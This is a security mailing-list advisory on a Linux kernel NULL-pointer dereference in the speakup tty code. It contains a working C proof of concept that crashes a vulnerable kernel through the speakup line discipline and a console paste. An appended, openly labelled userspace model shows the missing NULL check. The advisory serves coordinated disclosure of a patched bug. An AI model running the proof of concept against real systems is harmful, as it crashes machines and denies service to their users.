Date: Mon, 7 Dec 2020 10:20:44 +0800
From: Shisong Qin <qinshisong1205@...il.com>
To: oss-security@...ts.openwall.com
Cc: nopitydays@...il.com
Subject: Linux kernel NULL-ptr deref bug in spk_ttyio_receive_buf2

Hi,

Recently we found another NULL-ptr deref bug in spk_ttyio.c in the latest
Linux kernel (5.9.11 was the latest at that time). The
spk_ttyio_receive_buf2() function dereferences spk_ttyio_synth
without checking whether it is NULL, which may lead to a NULL-ptr
deref crash.

This bug can be reproduced on the Linux kernel (e.g. 5.9.11) with
CONFIG_ACCESSIBILITY=y, CONFIG_SPEAKUP=y and CONFIG_KASAN=y; here is a
simple PoC:

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <linux/tty.h>    /* N_SPEAKUP (== 0x1a) */
#include <linux/tiocl.h>  /* TIOCL_SETSEL (2), TIOCL_PASTESEL (3) */

/* TIOCLINUX expects a one-byte subcode immediately followed by the
 * struct tiocl_selection payload, so the layout must be packed. */
#pragma pack(1)
typedef struct {
        char subcode;
        short xs, ys, xe, ye;
        short sel_mode;
} sel_struct;
#pragma pack()

int main(void) {
    /* Switch tty1 to the speakup line discipline from userspace. Speakup
     * itself never set this tty up, so spk_ttyio_synth is still NULL. */
    int disc = N_SPEAKUP;
    int fd = open("/dev/tty1", O_RDONLY);
    if (fd < 0) {
        perror("open /dev/tty1");
        return 1;
    }
    if (ioctl(fd, TIOCSETD, &disc) < 0) {
        perror("ioctl TIOCSETD");
        return 1;
    }

    /* Set a console selection so that there is something to paste. */
    sel_struct sel;
    sel.subcode = TIOCL_SETSEL;
    sel.xs = sel.ys = sel.xe = sel.ye = 0;
    sel.sel_mode = 0x0; /* sel_mode 0x0/0x1/0x2 all trigger this NULL-ptr deref */
    if (ioctl(fd, TIOCLINUX, &sel) < 0)
        perror("ioctl TIOCLINUX(TIOCL_SETSEL)");

    /* Paste the selection back into the tty: the pasted bytes are handed to
     * the line discipline's receive_buf2, i.e. spk_ttyio_receive_buf2(),
     * which dereferences the NULL spk_ttyio_synth. */
    char data = TIOCL_PASTESEL;
    if (ioctl(fd, TIOCLINUX, &data) < 0)
        perror("ioctl TIOCLINUX(TIOCL_PASTESEL)");

    close(fd);
    return 0;
}

Here is the commit that patches this bug:
https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/char-misc.git/commit/?h=char-misc-linus&id=f0992098cadb4c9c6a00703b66cafe604e178fea

Timeline:
* 2020/11/24 - Vulnerability reported to security@...nel.org
* 2020/11/29 - Vulnerability confirmed, and reported to
linux-distros@...openwall.org.
* 2020/12/7 - Vulnerability disclosed publicly.

Thanks, Shisong Qin and Bodong Zhao, Tsinghua University
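The failure mode described in the report, modelled in userspace as an added example (this is not kernel code and not part of the original message): a receive_buf2-style callback that dereferences a module-global synth pointer which is still NULL when userspace, rather than speakup itself, selected the line discipline, next to the same callback with the NULL check that is missing in the vulnerable shape. The struct and function names (synth_model, attach_synth, receive_buf2_*) are mine, the pasted input is constructed, and the hardened variant is only the obvious local mitigation; the upstream commit linked above is the authoritative fix.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the synth object spk_ttyio.c talks to; the
 * field names are mine, not the kernel's. */
struct synth_model {
    const char *name;
    size_t bytes_received;
    unsigned char last[16];
};

/* Stands in for spk_ttyio_synth: NULL until a synth driver attaches. */
static struct synth_model *synth_model = NULL;

void attach_synth(struct synth_model *s) { synth_model = s; }
void detach_synth(void) { synth_model = NULL; }

/* Shape of the bug reported above: the callback assumes a synth is loaded.
 * Called while synth_model is NULL (userspace set the line discipline, so
 * no synth ever attached) the first field access is a NULL-pointer
 * dereference, which in the kernel is the oops the PoC produces. */
int receive_buf2_vulnerable(const unsigned char *cp, size_t count)
{
    size_t n = count < sizeof(synth_model->last) ? count
                                                 : sizeof(synth_model->last);
    synth_model->bytes_received += count;   /* crashes when synth_model is NULL */
    memcpy(synth_model->last, cp, n);
    return (int)count;
}

/* Hardened shape: refuse the data when no synth is attached. Returning 0
 * reports that nothing was consumed instead of touching an uninitialised
 * pointer; the callback is then harmless no matter who set the ldisc. */
int receive_buf2_hardened(const unsigned char *cp, size_t count)
{
    if (!synth_model)
        return 0;
    return receive_buf2_vulnerable(cp, count);
}

int main(void)
{
    static const unsigned char pasted[] = "hello";   /* constructed input */
    struct synth_model s = { .name = "model", .bytes_received = 0 };

    /* No synth attached: the hardened path is safe; the vulnerable path
     * would dereference NULL here. */
    printf("hardened, no synth: consumed %d\n",
           receive_buf2_hardened(pasted, sizeof pasted - 1));

    attach_synth(&s);
    printf("hardened, synth attached: consumed %d, total %zu\n",
           receive_buf2_hardened(pasted, sizeof pasted - 1), s.bytes_received);
    detach_synth();
    return 0;
}
```

The check sits at the single entry point the tty layer calls into, which is the place a reviewer would look for it: every path that can feed bytes to the line discipline (the TIOCL_PASTESEL paste in the PoC included) goes through it.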
